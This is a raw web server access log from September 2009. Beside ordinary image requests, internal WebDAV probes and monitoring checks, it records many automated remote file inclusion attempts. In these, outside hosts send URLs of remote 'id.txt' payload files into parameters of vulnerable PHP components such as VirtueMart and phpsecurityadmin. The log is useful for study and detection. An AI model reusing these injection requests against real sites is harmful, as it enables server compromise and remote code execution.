211.115.89.7 - - [23/Sep/2009:08:21:12 -0400] "GET /logs/access_log.Q109081500%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:21:12 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:21:12 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.108.130.197 - - [23/Sep/2009:08:21:13 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:13 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:13 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:13 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:14 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
88.108.130.197 - - [23/Sep/2009:08:21:17 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
218.38.243.71 - - [23/Sep/2009:08:21:30 -0400] "GET /logs/access_log.Q109050800%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:21:41 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:21:41 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:21:42 -0400] "GET /logs/access_log.Q109081500%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:08:21:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:21:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:21:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.7 - - [23/Sep/2009:08:21:43 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
86.109.109.87 - - [23/Sep/2009:08:21:46 -0400] "GET ///////////////////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 469 "-" "Mozilla/5.0"
86.109.109.87 - - [23/Sep/2009:08:21:46 -0400] "GET /logs/access_log.Q109091500%20%20///////////////////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
86.109.109.87 - - [23/Sep/2009:08:21:46 -0400] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 18994 "-" "Mozilla/5.0"
86.109.109.87 - - [23/Sep/2009:08:21:50 -0400] "GET /logs/access_log.Q109081500%20%20///////////////////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:22:08 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:22:10 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:22:10 -0400] "GET /logs/error_log.Q109060400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [23/Sep/2009:08:22:23 -0400] "GET /logs/access_log.Q109081500%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:22:23 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.38.243.71 - - [23/Sep/2009:08:22:39 -0400] "GET /logs/access_log.Q109050800%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [23/Sep/2009:08:22:42 -0400] "GET /logs/access_log.Q109082400%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [23/Sep/2009:08:22:44 -0400] "GET /logs/access_log.Q109072000%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:08:22:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:22:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:22:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [23/Sep/2009:08:22:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [23/Sep/2009:08:22:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [23/Sep/2009:08:22:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Sep/2009:08:23:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [23/Sep/2009:08:23:31 -0400] "GET /logs/access_log.Q109082400%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [23/Sep/2009:08:23:32 -0400] "GET /logs/access_log.Q109072000%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:08:24:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:24:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:24:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.76.121.198 - - [23/Sep/2009:08:24:47 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "http://us.mg2.mail.yahoo.com/dc/launch?.gx=0&.rand=cepa5jglmnk4i" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
172.16.1.176 - - [23/Sep/2009:08:25:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:08:25:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:08:25:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.7 - - [23/Sep/2009:08:26:21 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:26:21 -0400] "GET /logs/access_log.Q109081500%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:26:21 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:26:31 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:26:31 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:26:31 -0400] "GET /logs/access_log.Q109062700%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:26:55 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:08:27:12 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:08:27:12 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:08:27:12 -0400] "GET /logs/access_log.Q109082000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
172.16.1.74 - - [23/Sep/2009:08:27:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:27:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:27:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.221.88.162 - - [23/Sep/2009:08:27:29 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:27:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:27:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:27:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
77.222.40.169 - - [23/Sep/2009:08:27:43 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:08:27:43 -0400] "GET /logs/access_log.Q109071600///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:08:27:43 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 200 18978 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:27:48 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:27:48 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:27:48 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
172.16.1.66 - - [23/Sep/2009:08:27:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [23/Sep/2009:08:27:58 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [23/Sep/2009:08:27:58 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
84.51.38.170 - - [23/Sep/2009:08:28:01 -0400] "GET /logs/error_log.Q109060400%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.222.40.36 - - [23/Sep/2009:08:28:18 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.222.40.36 - - [23/Sep/2009:08:28:18 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
77.222.40.36 - - [23/Sep/2009:08:28:18 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:08:28:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:28:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:28:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.100.5.136 - - [23/Sep/2009:08:28:36 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:28:36 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:28:36 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:28:36 -0400] "GET /logs/access_log.Q109051600%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:08:28:44 -0400] "GET /logs/access_log.Q109071600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:08:29:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.170 - - [23/Sep/2009:08:29:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [23/Sep/2009:08:29:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [23/Sep/2009:08:29:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:29:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:29:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:29:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.109.108.146 - - [23/Sep/2009:08:29:48 -0400] "GET /logs/main.php?pagina=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:08:29:48 -0400] "GET /main.php?pagina=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:29:54 -0400] "GET /logs/error_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
172.16.1.176 - - [23/Sep/2009:08:29:55 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:08:29:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:08:29:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.234.62.129 - - [23/Sep/2009:08:30:19 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:08:30:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:08:30:27 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:08:30:27 -0400] "GET /logs/access_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.110.97.12 - - [23/Sep/2009:08:30:43 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.110.97.12 - - [23/Sep/2009:08:30:43 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.51.38.170 - - [23/Sep/2009:08:31:08 -0400] "GET /logs/access_log.Q109082500%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:08:31:32 -0400] "GET /logs/error_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:08:31:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:31:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:08:31:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.7 - - [23/Sep/2009:08:31:44 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:44 -0400] "GET /logs/access_log.Q109091500%20%20///?_SERVER[DOCUMENT_ROOT]=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:44 -0400] "GET /logs/access_log.Q109071600%20%20///?_SERVER[DOCUMENT_ROOT]=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:43 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 200 18978 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:45 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
